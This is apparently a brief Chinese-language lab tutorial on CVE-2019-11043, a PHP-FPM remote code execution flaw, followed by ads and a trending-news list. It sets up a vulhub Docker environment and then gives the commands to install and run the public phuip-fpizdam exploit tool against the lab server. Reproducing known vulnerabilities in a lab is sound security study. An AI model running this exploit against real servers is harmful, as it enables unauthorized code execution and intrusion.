CVE-2019-11043 PHP-FPM执行任意代码
0x00背景
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
0x01环境搭建
下载漏洞环境,使用docker搭建,漏洞环境地址https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043,进入漏洞环境目录,执行docker-compose up -d命令,进行安装。
漏洞环境搭建成功,如图
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
./phuip-fpizdam http://192.168.175.135:8080/index.php
0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 总书记要求用好这把“戒尺” 4991575
- 2 以色列对伊朗发动导弹袭击 4952026
- 3 伊朗防空系统启动:夜色中拦截导弹 4870472
- 4 从消博会看消费新趋势 4731486
- 5 抗战烈士墓发现年轻女子照片 4628262
- 6 学生偷外卖被毒死?学校回应 4507842
- 7 周深在联合国总部献唱 4480115
- 8 以色列称提前通知美国将实施报复 4376086
- 9 养老保险断缴即清零?不实 4280164
- 10 文旅部回应薛之谦演唱会眼镜哥事件 4168338